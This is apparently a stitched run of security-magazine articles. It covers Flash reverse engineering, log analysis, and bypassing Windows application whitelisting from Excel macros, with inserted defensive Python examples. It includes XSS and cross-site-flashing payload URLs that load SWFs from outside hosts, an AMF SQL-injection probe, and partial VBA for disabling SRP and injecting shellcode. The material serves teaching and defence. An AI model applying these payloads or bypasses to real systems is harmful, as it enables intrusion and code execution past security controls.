- NetServices.createGatewayConnection() 
- NetStream.play() 
- Sound.loadSound() 
- XML.load() 
- XML.send() 
- XML.sendAndLoad() 

An example of the script code would be: 

    loadMovie(_root.URL); 

When such a function is intended to call upon other domains, it becomes unsafe because the parameter can be exploited easily in the following manner: 

    http://www.example.com/test_flash.swf?URL=asfunction:loadMovie,javascript:alert('XSS') 

All the other methods above can cause XSS in similar ways in Flash driven RIA. It is possible to dump the file, discover the respective pointers and analyze it in ways similar to the ones described for the case of getURL earlier. 

Case Study 2: Cross Site Flashing with RIA 

XSF (Cross Site Flashing) is very similar to an XSS attack. The basic concept of XSF is the loading of a movie by another movie. Here the application is designed to load only a safe .swf file, specifically from its own server. But if an XSF point is discovered, it is exploited by an attacker by forcing another file from an untrusted domain to be loaded. By using the XSF attack, the attacker can: 

• Load an XSS vulnerable Flash file or 
• Cause a phishing attack. 

The same functions as the ones listed above can lead to such XSF attacks. For example, consider that an application has code such as: 

    loadMovieNum(_root.moviename, 1); 

An attacker here would inject his own movie and craft the URL to become: 

    http://www.example.com/XSF?moviename=http://www.xyz.com/xss.swf 

If the .swf file were dumped and the method searched for, this attack could be discovered. 
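The two input checks proposed in this paper, the getURL/clickTAG rule from section A (accept only http or https, reject '<' and '>') and the same-server rule for loadMovie/loadMovieNum from this case study, written out as an added example. This is not code from the paper: the function names, the allowed-host list and the classification of the paper's own sample URLs are assumptions made here.

```python
"""Allow-list checks for flashvars that reach Flash sinks (added example).
safe_navigation_target() implements the getURL/clickTAG rule from the text
(http/https only, no markup characters), same_origin_movie() the XSF rule
(loadMovie/loadMovieNum may only fetch from the application's own host).
Function names and OWN_HOSTS are assumptions; SAMPLES are the paper's URLs."""
from urllib.parse import parse_qs, urlsplit

# Pseudo-schemes that execute script or ActionScript instead of fetching.
SCRIPT_SCHEMES = ("javascript", "asfunction", "vbscript", "data")


def safe_navigation_target(value: str) -> bool:
    """True if `value` may be handed to getURL: an absolute http(s) URL with a
    host, no markup characters, and no script pseudo-scheme anywhere inside
    (the paper's asfunction:loadMovie,javascript:... payload nests one)."""
    if not value or any(ch in value for ch in "<>\"'"):
        return False
    parts = urlsplit(value.strip())
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return False
    packed = value.lower().replace(" ", "")
    return not any(scheme + ":" in packed for scheme in SCRIPT_SCHEMES)


def same_origin_movie(value: str, allowed_hosts: frozenset) -> bool:
    """True if `value` may be handed to loadMovie/loadMovieNum: it must pass
    safe_navigation_target() and its host must be one of our own."""
    if not safe_navigation_target(value):
        return False
    host = (urlsplit(value.strip()).hostname or "").lower()
    return host in allowed_hosts


def flashvar(url: str, name: str) -> str:
    """Extract one flashvar from the query string of a request URL."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [""])[0]


OWN_HOSTS = frozenset({"www.example.com"})   # assumption: the app's own host

# The paper's request URLs (constructed sample; expected verdict alongside).
SAMPLES = [
    # legitimate clickTAG tracking call from the <embed> tag
    ("http://www.example.com/Banner.swf?clickTAG=http://www.example.com/track?http://www.example.com", "clickTAG", True),
    ("http://www.example.com/Banner.swf?clickTAG=javascript:alert('XSS')", "clickTAG", False),
    ("http://www.example.com/test_flash.swf?input=<a href=\"javascript:alert('XSS')\">Click</a>", "input", False),
    ("http://www.example.com/test_flash.swf?input=<img src=\"http://evil/evil.swf\">", "input", False),
    ("http://www.example.com/test_flash.swf?URL=asfunction:loadMovie,javascript:alert('XSS')", "URL", False),
]


def audit_navigation(samples=SAMPLES):
    """Return [(verdict, value)] for every sample, using the getURL rule."""
    return [(safe_navigation_target(flashvar(u, p)), flashvar(u, p)) for u, p, _ in samples]


def audit_xsf(url: str, allowed_hosts=OWN_HOSTS) -> bool:
    """Apply the XSF rule to the 'moviename' flashvar of a request URL."""
    return same_origin_movie(flashvar(url, "moviename"), allowed_hosts)


if __name__ == "__main__":
    for (verdict, value), (_, _, expected) in zip(audit_navigation(), SAMPLES):
        print("OK " if verdict == expected else "?? ", verdict, value)
    print(audit_xsf("http://www.example.com/XSF?moviename=http://www.xyz.com/xss.swf"))       # False
    print(audit_xsf("http://www.example.com/XSF?moviename=http://www.example.com/intro.swf"))  # True
```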

Case Study 3: Embedded SWF files within other SWF files - deeper reverse engineering 

In many cases, certain .swf files are planted to work around a shallow level of disassembly. To avoid being caught by the reverse engineers, the malicious code is planted as a .swf file, but embedded in another .swf file. The parent file is designed to look relatively simple and not hazardous. Only on closer inspection is the manipulation discovered. 

Once caught, the reverse engineering process can be done recursively for the child .swf file. Through many such levels the final malicious file can be hidden, and found as well. 

The main purpose of this case study is to show the recursive aspects of the reverse engineering approach. Consider an .swf file like the one mentioned above, where the malicious code is not directly available in the output of the first dump. Running SWFDump on it merely gives an output where one can see a large list of bytes being pushed directly onto the stack by commands like: 

    xxxxx) + Y:Z pushbyte XX 

The bytes could continue to be pushed in large numbers; consider a case where they are then stored in some array by a command such as: 

    xxxxx) + Y:Z newarray wwwww params 
    xxxxx) + Y:Z setproperty<q>[public]::array 

where in all three commands above x, Y and Z denote individual integers (likely with different values in each command). 

When looking for the "array" in the remaining dump, one may find the mechanism that uses these bytes and decrypts them, for example with a string key stored initially and a regular XOR loop, or any other such mechanism. Therefore, the pushes can be extracted into a separate file and analyzed; from there, the bytes pushed may be written out to a separate file. 

Analyzing the mechanism of the code found around the decrypting part of the "array", it is not very difficult to guess the kind of decryption used. Hence, a script in Perl, Python or their likes can be written by hand to decrypt the extracted bytes, imitating the method found in the parent SWFDump output. On decrypting, the result could be another .swf file, and running a second SWFDump on this file is then required. If large hex strings are found to be pushed into the local registers in one of these dumps, these can be analyzed by converting them to a binary file using another small script. It would not be surprising if these large hex strings were additional .swf files themselves. At some point, SWFDump may fail to decode when it hits code containing a malware exploit. Hereafter - with some knowledge of what to look for and of the opcodes that SWFDump cannot parse - it is possible to find the problem manually. For example, the opcodes can be read as an .asm file and the mechanism of the exploit can then be analyzed. 

The crux of this study is that reverse engineering may not always stop at level 0. Depending on the first output, the suspicious code that does not make sense must be re-analyzed and, if need be, extracted using small scripts and then once again reverse engineered. 
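The extraction-and-decryption script this case study calls for, as an added example rather than code from the paper: it collects the operands of the pushbyte lines from a dump excerpt, undoes a repeating-key XOR, checks whether the result carries an SWF header, and converts a dumped hex string to binary. The listing format follows the "xxxxx) + Y:Z pushbyte XX" pattern above with XX assumed to be decimal; the key and the sample dump are constructed here.

```python
"""Recover a byte array pushed with 'pushbyte' opcodes in a swfdump listing,
decrypt it with a repeating-key XOR and test whether the result is itself an
SWF.  Added example, not from the paper: the dump excerpt, the key b"k3y"
and the assumption that pushbyte operands are printed in decimal are ours."""
import re
import struct

# "00012) + 3:1 pushbyte 31"  ->  operand 31
PUSHBYTE_RE = re.compile(r"^\s*\d+\)\s+\+\s*\d+:\d+\s+pushbyte\s+(\d+)\s*$")


def extract_pushed_bytes(dump_lines):
    """Collect the operand of every pushbyte line, in order, as bytes."""
    out = bytearray()
    for line in dump_lines:
        m = PUSHBYTE_RE.match(line)
        if m:
            out.append(int(m.group(1)) & 0xFF)
    return bytes(out)


def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the 'regular XOR loop' the paper describes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_swf(blob: bytes):
    """(signature, version, declared_length) if blob starts with an SWF
    header ('FWS'/'CWS', 1-byte version, u32 little-endian length), else None."""
    if len(blob) < 8 or blob[:3] not in (b"FWS", b"CWS"):
        return None
    version = blob[3]
    length = struct.unpack("<I", blob[4:8])[0]
    return blob[:3].decode(), version, length


def hex_string_to_bytes(s: str) -> bytes:
    """Convert a large hex string found in a dump into a binary blob."""
    return bytes.fromhex(re.sub(r"[^0-9a-fA-F]", "", s))


def recover_child_swf(dump_lines, key: bytes):
    """Full pipeline: pushbyte operands -> XOR decrypt -> SWF header check."""
    blob = xor_decrypt(extract_pushed_bytes(dump_lines), key)
    return blob, looks_like_swf(blob)


# --- constructed sample ------------------------------------------------
# A tiny fake child file: an uncompressed SWF header (version 9, declared
# length 24) plus filler, XORed with KEY and rendered as the pushbyte lines
# an analyst would see in the parent file's dump.
KEY = b"k3y"
_inner = b"FWS" + bytes([9]) + struct.pack("<I", 24) + b"\x00" * 16
_encrypted = xor_decrypt(_inner, KEY)   # XOR is symmetric

SAMPLE_DUMP = [
    "00000) + 0:1 getlocal0",
    "00001) + 1:1 pushscope",
] + [
    f"{i + 2:05d}) + {i + 1}:1 pushbyte {b}" for i, b in enumerate(_encrypted)
] + [
    f"{len(_encrypted) + 2:05d}) + {len(_encrypted) + 1}:1 newarray {len(_encrypted)} params",
    f"{len(_encrypted) + 3:05d}) + 1:1 setproperty<q>[public]::array",
]

if __name__ == "__main__":
    blob, header = recover_child_swf(SAMPLE_DUMP, KEY)
    print(header)   # ('FWS', 9, 24)
```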

II. Protocol analysis 

It is also possible to identify the service point and server side access points from Flash components. The subject Flash component may be communicating over AMF, JSON or XML to these back end components (as discussed in the previous section on architecture). These back end streams can be fuzzed and the attacker can discover a potential vulnerability. For example, consider the following login component (written using Flex). 

Figure 9 - Simple login in Flex. 

We can dump this .swf with SWFDump and look for the service point for this example: 

Figure 10 - Flash message broker's end points. 
Charles Proxy provides AMF decoding and the following screenshots describe its working mechanism. 

The message broker's end point can be identified and the stream either reconstructed or manipulated by proxy thereafter. For example: 

[Screenshot of the decoded AMF Message tree: Header; Body [0] with Target, Response and Content [0], the latter carrying source, operation, the parameter array [0], messageId, clientId, timeToLive and timestamp.] 

Figure 11 - AMF passing username and password admin/admin. 

At this point it is easy to fuzz the stream, and a simple single quote can be passed as shown below. 

Figure 12 - Adding quote in the request. 

Along with the stack, here is the response: 

[Screenshot of the AMF response Body: a com.mysql.jdbc.exceptions.jdbc4 exception reading "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1", followed by the Java stack trace through sun.reflect.NativeConstructorAccessorImpl.newInstance, sun.reflect.DelegatingConstructorAccessorImpl.newInstance, java.lang.reflect.Constructor.newInstance, com.mysql.jdbc.Util.handleNewInstance, com.mysql.jdbc.Util.getInstance, com.mysql.jdbc.SQLError.createSQLException and com.mysql.jdbc.MysqlIO.checkErrorPacket.] 

Here, the stack trace shows a possible SQL injection. An attacker can leverage this particular point and exploit the server side components from here using the AMF stream. 

Conclusion and prospects 

In this paper, we have focused on the security analysis of Flash components. The need for security analysis has been explained in the context of the current information era (Web 2.0). A small set of vulnerabilities has been examined, and the discussed approach applied to tackling them. A second approach, protocol analysis, has also been presented. 

It is possible to extend the same approaches to look out for other security loopholes such as: 

• Assumptions about clients' behavior - for example, expecting the client to enter only plain text as required in a textfield, and hence providing no validation, is too simplistic and has a major loophole wherein the client may inject executable JavaScript code in the same textfield. 

• Disclosure of business logic and secrets on the client side, i.e. the username-password authentication logic may have been deployed as client side ActionScript in the .swf file itself. In such a case, a simple decompiler like SWFScan could be used to reverse engineer the .swf file and this, in turn, would give away the ActionScript containing cleartext username-password combinations. 

Such avenues for the use of reverse engineering of Flash based Rich Internet Applications are many, and the idea of this paper is to open the eyes of the readers to reverse engineering and protocol analysis based Flash security, with enough examples and tools that the application of this approach may be considered by individuals and modified to suit their own scenario. 
What is a log? Without getting too philosophical, a log is a record of some activity occurring at or observed by an information system or application. Sometimes a collection of such log messages will also be called a log or a log file. Given this definition, log data is used to analyze activities occurring on information systems - whether such activity analysis is for assuring security, maintaining operations or proving regulatory compliance. 



Logs are under-appreciated in many - if not most - organizations. Often, logs are completely ignored and only noticed when disk space runs low. At that point they are usually deleted without review. And in some cases, some of the messages in the logs might have indicated that the disk was full and why, which means logs can be ironic as well. 

Logs can be an extremely useful source of information for security management. But getting that information takes both time and work. At first glance, it can seem a daunting task - the sheer volume of data, along with its diversity and often subjective nature, can be scary. 

Despite such challenges, logging is a primary means of IT accountability and thus its importance cannot be overstated. That is exactly why logging is a perfect compliance technology, mandated by many regulations and laws. Also, from the forensics point of view, logging makes proving that something has happened or has not happened a lot easier than digging through disk images. 

Dealing with logs 

The author is sometimes asked to define what "log management" is. It is not some secret technology you can buy for many thousands of dollars; it simply means dealing with logs. As mentioned before, some organizations "deal" with logs by ignoring and then deleting them, others deploy advanced systems and proficient personnel to perform near real-time analysis of log data. Due to confusing and often esoteric log messages, simply reading log messages turns out to be not entirely useful. Logs need to be analyzed to come to life and share their insights (see "Top 11 Reasons to Analyze Your Logs" - bit.ly/b2kMrE). 

At the same time, most of the principles and methods log analysis tools use hark back to the 1980s (yes, really!). Specifically, using regular expressions and simple pattern matching to insert logs into databases and then report on them has been known for nearly 30 years. Is this truly the state of the art of log analysis? Many security professionals believe that we are stuck with such ancient log analysis methods and that no innovation has occurred in the field. In this article, I will try to analyze what we are doing now about logs and what we can do in the future to solve the logging problem once and for all. 

What analysis? 

First, are logs really data? If you've come across such gems as 

    Aug 11 09:11:19 xx null pif ? exit! 0 

and 

    userenv [error] 1040 XYZI-CORP\vsupx No description available 

you will be tempted to consider logs to be a form of broken human language, not computer data. 

After all, most computers would prefer something more structured and less ambiguous! The continued existence of such pathetic log messages simply reminds us of the fact that most log analysis is still performed not even using the 1980s tools, but using a tool with an even older past - the human brain. 

Are logs neat computer data or subjective human text (sometimes also called unstructured data)? Before we delve into this, let's try to see the defining characteristics of these two: 

    Logs as Data                       | Logs as Text 
    -----------------------------------+--------------------------------- 
    Has structure: fields, values      | Lacks structure 
    Can be inserted into a database    | Needs preprocessing 
    Can be summarized and counted      | Needs to be "interpreted" 
    Mostly unambiguous                 | Highly ambiguous, subjective 
    Intended for automated systems     | Intended for humans 
    Example: XML                       | Example: English 



To add insult to injury, logs often present the worst kind of text - not just ambiguous but subjective, not just unstructured but jumbled. In many cases, this simply means that analysis becomes completely impossible. 

While many types of log data, such as firewall logs, intrusion detection logs or database audit trails, clearly belong in the data realm due to their structured nature, the same cannot be said about some other log types. 

Unix syslog presents a classic example: even for something as simple as a time stamp, there are more than 50 ways to express it. The rest of the message fares much worse - essentially, it will contain whatever the deranged mind of a super-busy developer will dump there. Application logs, and especially logs from vertical and niche applications, fare even worse than that. They contain hardly any information, resulting in gems like the ones shown above. 

With such a dire situation on our hands, what are our choices for log management and log analysis? 

The BEST way to deal with logs 

Are we on a fool's errand here? Is there such a thing as the best way for dealing with logs? Well, it has to be said that many organizations today deal with logs by ignoring them. While such behavior can be attributed to sheer stupidity, we can also consider it a lack of education. Having multiple competing priorities for IT and IT security managers' time and resources does not help the situation either. By the way, ignoring logs also covers the scenarios of not having logs and of turning them off. 

Storing logs is another common choice for log management. For many organizations that did not have logging or have been ignoring logs for years, this is a huge step forward. Now, at least, they can sleep better knowing that if something bad happens they can always go back and look up the activity records. However, this approach is only marginally better than the previous one. 

Attempts to start reading the stored logs periodically often result in failure. The volume and the diversity of log data - as well as its subjective nature - kill most manual log review projects. And we are not talking about gigabytes here - more than a few organizations have learned what a petabyte really is after engineering their log collection efforts. Overall, it is hard to gain awareness of the environment - whether for security or troubleshooting - simply by reading raw log data. 

We must try to filter the logs in order to detect only the "bad stuff". This approach certainly works in the field and many commercial and open source log analysis tools implement it. What makes it of limited value is that in many cases the thing we are looking for is not present in individual log messages, but can only be discovered from groups of messages correlated together. For example, while a connection to port 80 allowed by a firewall is not malicious by itself, a particular pattern of connectivity to port 80 of multiple machines might be. Also, some log messages cannot be qualified as "bad" but they are still interesting to look at as precursors for future "badness". 

For highly structured logs such as firewall connection logging, the answer is simple: collect the logs, tokenize them (the not entirely accurate term "parse" has become standard usage) and then use your database to filter and summarize as needed. Producing reports such as "top e-mail users", "most frequent ports used" and even "least frequent attachment types" has become the favorite pastime of firewall administrators and security managers. 



However, such log sources have been shrinking in importance, overshadowed by less structured server and application logs. I'm speaking from experience when I say that directing a large percentage of syslog messages from multiple Linux and Unix operating systems into a database is a laborious task - and one that needs to be constantly performed. 

The tools require hand-written regular expressions in order to put such logs into a database while extracting useful information (usernames, source IP addresses, even time stamps) from them. 

Of course, one can avoid parsing altogether, as well as avoid storing logs in a database; simply indexing logs with extremely limited field extraction (such as timestamp and the machine that produced the log) is quite popular as well. However, many data presentation and data analysis techniques become impossible as a result. 

This situation can be visualized using the diagram on the following page - typically, we can get useful information out of logs after spending a lot of effort (top right corner) or render them and focus on getting a small amount of value out of log data by indexing it only (bottom left corner). 

The diagram also gives us useful directions for the future. The red arrows indicate two possible directions for improving log analysis - one can either make parsing data easier or try to make indexed data more useful. However, there are also alternative approaches. 

We can wait for logs to become standardized and more structured. Efforts such as Common Event Expression (CEE), a MITRE run standard (cee.mitre.org), will eventually make logs more predictable and easier to analyze and understand. However, given the history of attempts to standardize logs, we might have to wait for at least a few years. 

Also, we can try using the emerging field of text mining for converting logs into data. But, even though using tools from an unproven field presents an interesting research challenge, it gives small hope for "instant gratification" to log analysts. 
[Diagram: log data plotted by how hard it is to get versus how useful it is. Indexed log data is EASY to GET but stays close to raw data (bottom left); parsed log data is HARD to GET but useful (top right). Two arrows mark the directions for improvement: make indexed data more useful, or make parsing easier.] 

Despite that, some open source tools such as slct (bit.ly/b8fl_zW) and LogHound (bit.ly/dcKzy8) use simple text mining algorithms such as text clustering in order to tackle the log beast. 
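The text clustering idea behind slct, shown as an added example rather than the tool's own code: words that recur at the same position in enough lines form a cluster template, everything else is replaced by a wildcard, and lines that match no template stand out as the first thing to review. The syslog lines are constructed here; the support threshold and the prefix-stripping regular expression are assumptions.

```python
"""SLCT-style clustering of log lines, as sketched by the article: words
frequent at a given position form the template, everything else becomes '*'.
Added example, not the slct tool itself; the syslog lines are constructed."""
import re
from collections import Counter, defaultdict

# "Mon DD HH:MM:SS host " - stripped so timestamps do not defeat clustering.
_PREFIX_RE = re.compile(r"^[A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2}\s+\S+\s+")


def strip_syslog_prefix(line: str) -> str:
    """Drop the timestamp/host prefix; the message body is what we cluster."""
    return _PREFIX_RE.sub("", line, count=1)


def cluster(lines, support=2):
    """Return {template: [original lines]}.  Pass 1 counts (position, word)
    pairs; pass 2 keeps a word only if its pair reached `support`."""
    tokenized = [strip_syslog_prefix(line).split() for line in lines]
    counts = Counter((i, w) for toks in tokenized for i, w in enumerate(toks))
    frequent = {pair for pair, n in counts.items() if n >= support}
    clusters = defaultdict(list)
    for raw, toks in zip(lines, tokenized):
        template = " ".join(w if (i, w) in frequent else "*" for i, w in enumerate(toks))
        clusters[template].append(raw)
    return dict(clusters)


def outliers(clusters):
    """Templates consisting only of wildcards: lines nothing else resembles,
    the first place a reviewer should look."""
    return {t: lines for t, lines in clusters.items() if set(t.split()) == {"*"}}


SAMPLE_LOGS = [  # constructed
    "Aug 11 09:11:19 host1 sshd[1001]: Accepted password for alice from 10.0.0.5 port 51022 ssh2",
    "Aug 11 09:12:03 host1 sshd[1002]: Accepted password for bob from 10.0.0.9 port 51100 ssh2",
    "Aug 11 09:13:44 host2 sshd[1003]: Failed password for invalid user root from 10.0.0.77 port 40000 ssh2",
    "Aug 11 09:13:45 host2 sshd[1004]: Failed password for invalid user admin from 10.0.0.77 port 40001 ssh2",
    "Aug 11 09:15:00 host1 null pif ? exit! 0",
]

if __name__ == "__main__":
    for template, members in cluster(SAMPLE_LOGS).items():
        print(f"{len(members):3d}  {template}")
```

Note that a value constant across a cluster (here the single source address of both failed logins) is kept in the template, which is exactly the kind of detail a reviewer wants surfaced.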

To make it even better, one can combine text mining methods such as text clustering, profiling of text streams, Bayesian mining and even natural language processing (the other NLP) with domain-specific keyword analysis. For example, by looking for keywords such as chang*, modif*, add*, delete*, drop, remove*, creat*, etc. over time across multiple system logs, one can profile how system changes are performed during normal business use. Such profiling will afterward allow us to detect unauthorized and anomalous changes recorded in the logs. 
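The keyword profiling just described, as an added example that is not part of the article: messages matching the change stems are counted per hour of day over a baseline period, and a change logged outside the hours in which the baseline ever saw changes is flagged. The log lines, the host names and the learned-window rule are constructed assumptions.

```python
"""Keyword-based change profiling across system logs, as the article
suggests: count messages matching chang*, modif*, add*, delete*, drop,
remove*, creat* per hour of day to learn when changes normally happen, then
flag changes outside that window.  Added example, not from the article; the
log lines are constructed and the window is learned from the baseline lines."""
import re
from collections import Counter

# The article's stems; deliberately loose, so 'added' and 'changed' match.
CHANGE_RE = re.compile(
    r"\b(chang\w*|modif\w*|add\w*|delete\w*|drop|remove\w*|creat\w*)\b", re.I)
# "Mon DD HH:MM:SS host message" -> (hour, host, message)
SYSLOG_RE = re.compile(
    r"^[A-Z][a-z]{2}\s+\d{1,2}\s+(\d{2}):\d{2}:\d{2}\s+(\S+)\s+(.*)$")


def change_events(lines):
    """(hour, host, keyword, message) for each line that mentions a change."""
    events = []
    for line in lines:
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        hour, host, msg = int(m.group(1)), m.group(2), m.group(3)
        kw = CHANGE_RE.search(msg)
        if kw:
            events.append((hour, host, kw.group(1).lower(), msg))
    return events


def hourly_profile(lines):
    """How many change messages the lines contain for each hour of day."""
    return Counter(hour for hour, *_ in change_events(lines))


def learned_window(baseline_lines):
    """(earliest, latest) hour in which the baseline recorded changes."""
    profile = hourly_profile(baseline_lines)
    return min(profile), max(profile)


def anomalous_changes(lines, baseline_lines):
    """Change events in `lines` logged outside the baseline's change window."""
    lo, hi = learned_window(baseline_lines)
    return [ev for ev in change_events(lines) if not lo <= ev[0] <= hi]


BASELINE_LOGS = [  # constructed: a normal business day
    "Aug 10 09:30:01 host1 groupadd[2001]: group added to /etc/group: name=devs",
    "Aug 10 11:02:17 host1 passwd[2105]: password changed for alice",
    "Aug 10 14:45:09 host2 sshd[2200]: Accepted password for bob from 10.0.0.9 port 51100 ssh2",
    "Aug 10 16:10:33 host2 puppet-agent[2300]: /etc/ntp.conf content changed '{md5}a' to '{md5}b'",
    "Aug 10 17:20:00 host1 userdel[2400]: delete user 'temp'",
]
NEW_LOGS = [  # constructed: the day under review
    "Aug 11 03:12:05 host2 groupadd[3200]: new group added: name=wheel2, GID=1010",
    "Aug 11 03:13:40 host2 sshd[3201]: Accepted password for root from 10.0.0.77 port 40000 ssh2",
    "Aug 11 10:15:42 host1 passwd[3100]: password changed for carol",
    "Aug 11 14:00:00 host1 kernel: usb 1-1: new device found",
]

if __name__ == "__main__":
    print("baseline change hours:", sorted(hourly_profile(BASELINE_LOGS).items()))
    for hour, host, kw, msg in anomalous_changes(NEW_LOGS, BASELINE_LOGS):
        print(f"{hour:02d}h {host} [{kw}] {msg}")
```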

Finally, there are semi-automated or "machine assisted" approaches for writing those regular expressions. They reduce the skill requirement for log analysis and are successfully used in the field by commercial vendors to parse simple log formats. 



While some people mistakenly consider log analysis and log management to be stagnant fields, it is true that many unresolved challenges remain. 

Apart from improving the analysis of log data, we also have the opportunity to improve the quality of logs, as well as instructing application developers in good logging practices. One thing is clear, though: we'll be dealing with greater quantities and an even wider array of different types of log data in the future. Consequently, the answers to the questions of what to do with them and what they are trying to tell us will have to be provided. 

The ideal log analysis application of the future should be able to analyze all kinds of logs - the familiar and the unfamiliar, from standard and custom log sources - and tell the users what they need to know about their environment. Such an application doesn't yet exist, but there are many promising avenues that need to be explored. 



Dr. Anton Chuvakin (www.chuvakin.org) is a recognized security expert in the field of log management and PCI DSS compliance. He is the author of several books and has published dozens of papers on log management, correlation, data analysis, PCI DSS and security management (www.info-secure.org). His blog (www.securitywarrior.org) is one of the most popular in the industry. 

Currently, he is developing his security consulting practice (www.securitywarriorconsulting.com), focusing on logging and PCI DSS compliance for security vendors and Fortune 500 organizations. He was formerly a Director of PCI Compliance Solutions at Qualys, and has worked at LogLogic as a Chief Logging Evangelist, tasked with educating the world about the importance of logging for security, compliance and operations. 
y and hacker conference providing two days of an interesting atmosphere for open discussions of critical infosec issues, privacy, information technology and its cultural/technical implications on society. 

Organized in Brussels, BruCON offers a high quality line up of speakers, security challenges and interesting workshops. 

More information available at http://www.brucon.org 

Want to become a partner or sponsor of a great event? Contact us via http://www.brucon.org 



Launch arbitrary code from Excel in a restricted environment 

The exercises presented here are all variations on the same theme: the launch of arbitrary code from Excel in a restricted environment. 



A Least-Privileged User Account (i.e. no administrative rights) on Windows and application whitelisting software (like Software Restriction Policies, AppLocker, etc.) are the main components of the restricted environment. Excel (or any other application supporting VBA) is installed in the environment with macros enabled. The objective of the environment is to restrict the code execution options available to the user. Unapproved code is not allowed to run. 

A typical example of such a restricted environment is a corporate Terminal Server session. The goal of the exercises is to explore Windows features that can be leveraged to bypass the restrictions and run arbitrary code. Vulnerability exploitation is excluded from these exercises. 

Loading a DLL 

Running arbitrary code is often done by creating a new process, but creating new processes is strictly controlled in a restricted environment. Loading a DLL inside an existing process is another way to run arbitrary code, and it doesn't require process creation. 

VBA - the VBScript programming language used in Excel - supports calling Win32 API functions. Loading a DLL inside Excel from a macro is done with LoadLibrary. To execute arbitrary code, the DLL is embedded inside the Excel VBA macro using BASE64 strings, as shown on the following page. 

The VBA macros of the first exercise do the following: 

1. Extract the BASE64 encoded DLL from the strings 
2. Write the DLL to a temporary file 
3. Load the DLL inside the Excel process 

Application whitelisting software that is not configured to whitelist DLLs (e.g. only EXEs are whitelisted) will not prevent the DLL from loading and executing. 
    Private Function DLLContent() As String 
        Dim sDLLContent As String 

        sDLLContent = "" 
        sDLLContent = sDLLContent + "..."   ' BASE64 fragment of the embedded DLL 
        sDLLContent = sDLLContent + "..." 
        ' ... many further lines of BASE64 string fragments (not reproduced) ... 



Bypassing SRP 

Software Restriction Policies supports whitelisting DLLs too, preventing an arbitrary DLL from loading. Mark Russinovich developed a tool to disable SRP as a LUA user (GPDisable). A design flaw of SRP is that it runs inside the user's own processes (it's implemented in advapi32.dll). Changing the value of a couple of variables used by advapi32.dll directly in memory disables SRP, allowing arbitrary DLLs to load. This too can be done from VBA macros: 



    Private Declare Function WriteProcessMemory Lib "KERNEL32" _ 
        (ByVal hProcess As Long, ByVal lpBaseAddress As Any, _ 
         lpBuffer As Any, ByVal nSize As Long, _ 
         lpNumberOfBytesWritten As Long) As Long 

    Private Declare Function LoadLibrary Lib "KERNEL32" Alias "LoadLibraryA" (...) 
    Private Declare Function FreeLibrary Lib "KERNEL32" (ByVal hLibModule ...) 

    Sub Load() 

        Dim hLibrary 
        Dim strFile 

        strFile = TempFilename 
        DumpFile strFile 

        ' version 5.1.2600.5512 
        iResult = WriteProcessMemory(-1, ..., ..., 1, 0) 
        iResult = WriteProcessMemory(-1, ..., ..., 1, 0) 
        hLibrary = LoadLibrary(strFile) 

        FreeLibrary hLibrary 
        DeleteFile strFile 

    (Listing reproduced from the screenshot; the two patched advapi32.dll addresses and values are not legible in the scan.) 



The VBA macros of the second exercise do the following: 

1. Disable SRP 
2. Extract the BASE64 encoded DLL from the strings 
3. Write the DLL to a temporary file 
4. Load the DLL inside the Excel process. 

Injecting shellcode 

When all types of executables (EXE, DLL, CPL, etc.) are whitelisted, injecting shellcode is the next option to explore. Shellcode is location-independent code, often written in an assembler, and is then injected and executed inside the memory space of an existing process. As shellcode is not your average application (it doesn't use executable files), most application whitelisting software doesn't block this. But they often detect and block this classic attempt to execute shellcode: shellcode is injected by process A into process B and executed inside process B by creating a remote thread. 

In this exercise however, shellcode is injected inside the Excel process by the Excel process itself, and no remote thread is created. I've yet to find a Host Intrusion Prevention System that detects this case. 
    Option Explicit 

    Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal ... 
    Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ... 

    Private Sub ExecuteShellCode() 

        Dim lpMemory As Long 
        Dim sShellCode As String 
        Dim iResult As Long 

    (Remainder of the listing not legible in the scan.) 
The VBA macros of the third exercise do the following: 

1. Extract the BASE64 encoded shellcode from the strings 
2. Write the shellcode to the Excel process memory 
3. Execute the shellcode by creating a new thread 

Loading a DLL from memory 

Although shellcode can be considered as arbitrary code, it's hard to write and it's 
extremely rare that complete applications are written in shellcode. Compiling arbitrary 
code into a DLL is much easier compared to writing it in shellcode. 

In this last exercise, I use special shellcode 
that I have developed to load a DLL into proc- 
ess memory directly from memory. It doesn't 
use LoadLibrary, but performs all the actions 
of LoadLibrary to load a DLL, except it does 
this from memory and not from disk. This is 
effectively a combination of previous exer- 
cises: loading a DLL and executing shellcode. 

In this exercise, a DLL version of cmd.exe is 
used - I compiled this DLL from the ReactOS 
source code for cmd.exe: 
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The result is a command line interpreter run- 
ning inside the Excel process. No new proc- 
ess is created, no DLL is written to disk. 

The VBA macros of the fourth exercise do the 
following: 

1. Extract the BASE64 encoded shellcode 
from the strings 

2. Write the shellcode to the Excel process 
memory 

3. Execute the shellcode by creating a new 
thread. 

The shellcode of the fourth exercise does the 
following: 

1. Loads the DLL embedded inside the shell- 
code into memory 

2. Jumps to the DLL entry point (DllMain). 
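As an added illustration (not the author's macros, which appear above only as screenshots), the following Python scan looks for the two halves of the pattern these four exercises share: Win32 API declarations that let a macro allocate and write memory inside the Office process or drop and load a DLL, and a long BASE64 string literal carrying the payload. The sample macro text and the benign macro are constructed for the example; CreateThread is named as the usual API behind "creating a new thread" and is an assumption, as are the severity labels.

```python
import base64
import binascii
import re

# Constructed sample macro in the shape the exercises describe: Win32 API
# declarations plus a long BASE64 string decoded at run time. Not the
# author's code; the "payload" is just an MZ header followed by zero bytes.
_FAKE_PAYLOAD = base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60).decode()
SAMPLE_VBA = (
    'Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, '
    'ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long\n'
    'Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, '
    'ByVal lpBaseAddress As Long, ByVal lpBuffer As String, ByVal nSize As Long, '
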